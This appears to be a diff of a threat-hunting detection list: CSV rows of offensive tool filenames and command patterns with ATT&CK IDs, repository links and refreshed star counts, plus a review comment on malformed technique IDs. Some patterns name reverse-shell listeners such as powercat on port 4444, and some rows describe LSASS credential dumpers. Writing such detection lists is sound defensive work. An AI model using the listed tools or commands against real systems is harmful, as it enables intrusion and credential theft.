security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*PostMulitDomainSpider.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*PostMulitMsfGetDomainInfoByBloodHound.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*PostPowershellPowerViewAddNetUser.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 
- T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" 
@@ -14914,31 +15082,31 @@
 "*PostRewMsfPostConfInfos.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
 "*PotatoTrigger.cpp*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z"
 "*PotatoTrigger.cpp*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z"
-"*PowerBreach.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
-"*PowerBruteLogon.*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","112","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z"
+"*PowerBreach.ps1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*PowerBruteLogon.*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z"
 "*powercat -c * -p *","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
 "*powercat -l -p 4444*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
 "*Powercat.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
-"*powerdump.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*powerdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*powerdump.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*powerdump.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*PowerExtract-main.zip*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z"
-"*PowerForensics*","offensive_tool_keyword","PowerForensics","The purpose of PowerForensics is to provide an all inclusive framework for hard drive forensic analysis. PowerForensics currently supports NTFS and FAT file systems. and work has begun on Extended File System and HFS+ support.","T1003 - T1039 - T1046 - T1057","TA0005 - TA0007 - TA0010","N/A","N/A","Information Gathering","https://github.com/Invoke-IR/PowerForensics","1","1","N/A","N/A","10","1324","285","2022-05-20T14:43:10Z","2015-03-07T17:12:19Z"
+"*PowerForensics*","offensive_tool_keyword","PowerForensics","The purpose of PowerForensics is to provide an all inclusive framework for hard drive forensic analysis. PowerForensics currently supports NTFS and FAT file systems. and work has begun on Extended File System and HFS+ support.","T1003 - T1039 - T1046 - T1057","TA0005 - TA0007 - TA0010","N/A","N/A","Information Gathering","https://github.com/Invoke-IR/PowerForensics","1","1","N/A","N/A","10","1324","286","2022-05-20T14:43:10Z","2015-03-07T17:12:19Z"
 "*powerglot.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
 "*powerkatz.dll*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z"
-"*powerkatz_x64.dll*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
-"*powerkatz_x86.dll*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
-"*PowerLessShell*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1393","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z"
-"*PowerLessShell.py*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1393","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z"
-"*powermad.ps1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1021","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z"
-"*Powermad.psd1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1021","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z"
-"*Powermad.psm1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1021","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z"
-"*Powermad-master*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1021","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z"
+"*powerkatz_x64.dll*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*powerkatz_x86.dll*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*PowerLessShell*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1395","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z"
+"*PowerLessShell.py*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1395","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z"
+"*powermad.ps1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z"
+"*Powermad.psd1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z"
+"*Powermad.psm1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z"
+"*Powermad-master*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z"
 "*PowerMemory*","offensive_tool_keyword","PowerMemory","Exploit the credentials present in files and memory","T1003 - T1555 - T1213 - T1558","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/giMini/PowerMemory","1","0","N/A","N/A","9","819","219","2023-05-25T17:58:53Z","2015-08-29T17:09:23Z"
 "*PowerOPS*","offensive_tool_keyword","PowerOPS","PowerOPS is an application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a powershell runspace environment (.NET). It intends to include multiple offensive PowerShell modules to make the process of Post Exploitation easier.","T1059 - T1027 - T1053 - T1129 - T1086","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/fdiskyou/PowerOPS","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*powerpick -Command *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z"
-"*powerpick.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z"
-"*PowerPick.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z"
-"*Powerpreter.psm1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
+"*powerpick.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*PowerPick.x64.dll*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z"
+"*Powerpreter.psm1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z"
 "*powerpwn.powerdump*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z"
 "*powerpwn_tests*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z"
 "*power-pwn-main*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z"
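Review bot: Several rows refreshed in this hunk carry `metadata_tool_techniques` values that break the ` - `-separated, dot-notation form used by the Empire row (`T1548.002 - T1134 - …`), so a consumer that splits on ` - ` or validates ATT&CK IDs will mis-map these keywords. The metasploit rows (`*powerdump.ps1*`, `*powerdump.rb*`) contain `T1204 -T1210` with a missing space, the covenant and havoc rows write sub-techniques with a hyphen (`T1573-001`, `T1059-001`) where ATT&CK uses a dot (`T1573.001`), and the nishang row `*Powerpreter.psm1*` has `T1550 T1555 T1212 T1558` with no separator and `N/A` tactics. The Empire row's `metadata_groups_name` also ends with a dangling ` - ` after `Turla`. Since the rows are being rewritten for the star/fork refresh anyway, I would normalise these fields here, or add a CI check that every technique token matches `T\d{4}(\.\d{3})?`.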
@@ -14948,10 +15116,10 @@
 "*PowerSCCM-master*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z"
 "*powerseb/PowerExtract*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z"
 "*powerseb/PowerExtract*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z"
-"*PowerSharpBinaries*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
-"*PowerSharpPack.ps1*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
-"*PowerSharpPack-master*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z"
